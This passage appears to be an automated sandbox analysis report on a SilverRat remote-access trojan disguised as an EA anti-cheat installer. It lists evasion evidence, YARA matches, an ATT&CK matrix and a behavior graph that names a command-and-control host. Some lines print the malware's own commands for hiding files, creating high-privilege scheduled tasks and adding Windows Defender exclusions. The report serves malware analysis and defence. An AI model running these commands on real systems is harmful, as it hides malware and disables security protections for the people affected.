                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Source: Yara matchFile source: Xyq6rvzLJs.exe, type: SAMPLE
                  Source: Yara matchFile source: 0.0.Xyq6rvzLJs.exe.620000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Xyq6rvzLJs.exe.3f77ae8.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Xyq6rvzLJs.exe.3f77ae8.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000002.2077667438.0000000003F74000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.2051314011.0000000000622000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: Xyq6rvzLJs.exe PID: 2764, type: MEMORYSTR
                  Source: Yara matchFile source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exe, type: DROPPED
                  Source: C:\Users\user\Desktop\Xyq6rvzLJs.exeMemory allocated: E50000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\Xyq6rvzLJs.exeMemory allocated: 1BAC0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeMemory allocated: 16F0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeMemory allocated: 1BCF0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeMemory allocated: 3180000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeMemory allocated: 1B770000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\Xyq6rvzLJs.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7384Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2294Jump to behavior
                  Source: C:\Users\user\Desktop\Xyq6rvzLJs.exe TID: 4144Thread sleep count: 237 > 30Jump to behavior
                  Source: C:\Users\user\Desktop\Xyq6rvzLJs.exe TID: 4144Thread sleep count: 263 > 30Jump to behavior
                  Source: C:\Users\user\Desktop\Xyq6rvzLJs.exe TID: 5256Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5524Thread sleep time: -6456360425798339s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exe TID: 6680Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Xyq6rvzLJs.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: Xyq6rvzLJs.exe, 00000000.00000002.2077052994.0000000001088000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllC
                  Source: $77EAAntiCheat.Installler.exe, 0000000C.00000002.3300193565.000000001C909000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: C:\Users\user\Desktop\Xyq6rvzLJs.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\Desktop\Xyq6rvzLJs.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\Xyq6rvzLJs.exeMemory allocated: page read and write | page guardJump to behavior
                  Source: C:\Users\user\Desktop\Xyq6rvzLJs.exeProcess created: C:\Windows\System32\attrib.exe "C:\Windows\System32\attrib.exe" +s +h "C:\Users\user\AppData\Roaming\EA"Jump to behavior
                  Source: C:\Users\user\Desktop\Xyq6rvzLJs.exeProcess created: C:\Windows\System32\attrib.exe "C:\Windows\System32\attrib.exe" +s +h "C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\Xyq6rvzLJs.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpF224.tmp.bat""Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout 3Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exe "C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exe" Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeProcess created: C:\Windows\System32\schtasks.exe "schtasks.exe" /query /TN $77EAAntiCheat.Installler.exeJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeProcess created: C:\Windows\System32\schtasks.exe "schtasks.exe" /Create /SC ONCE /TN "$77EAAntiCheat.Installler.exe" /TR "C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exe \"\$77EAAntiCheat.Installler.exe\" /AsAdmin" /ST 00:01 /IT /F /RL HIGHESTJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeProcess created: C:\Windows\System32\schtasks.exe "schtasks.exe" /query /TN $77EAAntiCheat.Installler.exeJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionExtension exe,bat,dll,ps1;exitJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /sc daily /tn "EAAntiCheat.Installler_Task-DAILY-21PM" /TR "%MyFile%" /ST 21:00Jump to behavior
                  Source: C:\Users\user\Desktop\Xyq6rvzLJs.exeQueries volume information: C:\Users\user\Desktop\Xyq6rvzLJs.exe VolumeInformationJump to behavior
                  Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeQueries volume information: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exe VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeQueries volume information: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Xyq6rvzLJs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Lowering of HIPS / PFW / Operating System Security Settings

                  barindex
                  Source: Yara matchFile source: Xyq6rvzLJs.exe, type: SAMPLE
                  Source: Yara matchFile source: 0.0.Xyq6rvzLJs.exe.620000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Xyq6rvzLJs.exe.3f77ae8.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Xyq6rvzLJs.exe.3f77ae8.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000002.2077667438.0000000003F74000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.2051314011.0000000000622000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: Xyq6rvzLJs.exe PID: 2764, type: MEMORYSTR
                  Source: Yara matchFile source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exe, type: DROPPED
                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity Information1
                  Scripting
                  Valid Accounts1
                  Command and Scripting Interpreter
                  1
                  Scripting
                  1
                  DLL Side-Loading
                  1
                  Disable or Modify Tools
                  1
                  Input Capture
                  1
                  File and Directory Discovery
                  Remote Services11
                  Archive Collected Data
                  2
                  Ingress Tool Transfer
                  Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault Accounts21
                  Scheduled Task/Job
                  1
                  DLL Side-Loading
                  11
                  Process Injection
                  1
                  Deobfuscate/Decode Files or Information
                  LSASS Memory13
                  System Information Discovery
                  Remote Desktop Protocol1
                  Input Capture
                  11
                  Encrypted Channel
                  Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAt21
                  Scheduled Task/Job
                  21
                  Scheduled Task/Job
                  111
                  Obfuscated Files or Information
                  Security Account Manager1
                  Query Registry
                  SMB/Windows Admin SharesData from Network Shared Drive1
                  Non-Standard Port
                  Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCron1
                  Registry Run Keys / Startup Folder
                  1
                  Registry Run Keys / Startup Folder
                  1
                  Software Packing
                  NTDS11
                  Security Software Discovery
                  Distributed Component Object ModelInput Capture3
                  Non-Application Layer Protocol
                  Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                  DLL Side-Loading
                  LSA Secrets1
                  Process Discovery
                  SSHKeylogging4
                  Application Layer Protocol
                  Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                  Masquerading
                  Cached Domain Credentials31
                  Virtualization/Sandbox Evasion
                  VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items31
                  Virtualization/Sandbox Evasion
                  DCSync1
                  Application Window Discovery
                  Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
                  Process Injection
                  Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1552937 Sample: Xyq6rvzLJs.exe Startdate: 09/11/2024 Architecture: WINDOWS Score: 100 59 kanibal.mooo.com 2->59 61 discord.com 2->61 69 Antivirus / Scanner detection for submitted sample 2->69 71 Multi AV Scanner detection for submitted file 2->71 73 Yara detected SilverRat 2->73 75 6 other signatures 2->75 10 Xyq6rvzLJs.exe 1 8 2->10         started        14 $77EAAntiCheat.Installler.exe 3 2->14         started        signatures3 process4 file5 55 C:\Users\...\$77EAAntiCheat.Installler.exe, PE32+ 10->55 dropped 57 C:\Users\user\AppData\...\Xyq6rvzLJs.exe.log, CSV 10->57 dropped 85 Uses cmd line tools excessively to alter registry or file data 10->85 16 cmd.exe 1 10->16         started        18 attrib.exe 1 10->18         started        20 attrib.exe 1 10->20         started        signatures6 process7 process8 22 $77EAAntiCheat.Installler.exe 14 3 16->22         started        26 conhost.exe 16->26         started        28 timeout.exe 1 16->28         started        30 conhost.exe 18->30         started        32 conhost.exe 20->32         started        dnsIp9 63 kanibal.mooo.com 141.98.102.187, 29853, 49707, 49709 M247GB Romania 22->63 65 discord.com 162.159.137.232, 443, 49706 CLOUDFLARENETUS United States 22->65 77 Antivirus detection for dropped file 22->77 79 Multi AV Scanner detection for dropped file 22->79 81 Machine Learning detection for dropped file 22->81 83 Uses schtasks.exe or at.exe to add and modify task schedules 22->83 34 powershell.exe 23 22->34         started        37 schtasks.exe 1 22->37         started        39 schtasks.exe 1 22->39         started        41 2 other processes 22->41 signatures10 process11 signatures12 67 Loading BitLocker PowerShell Module 34->67 43 conhost.exe 34->43         started        45 WmiPrvSE.exe 34->45         started        47 conhost.exe 37->47         started        49 conhost.exe 39->49         started        51 conhost.exe 41->51         started        53 conhost.exe 41->53         started        process13

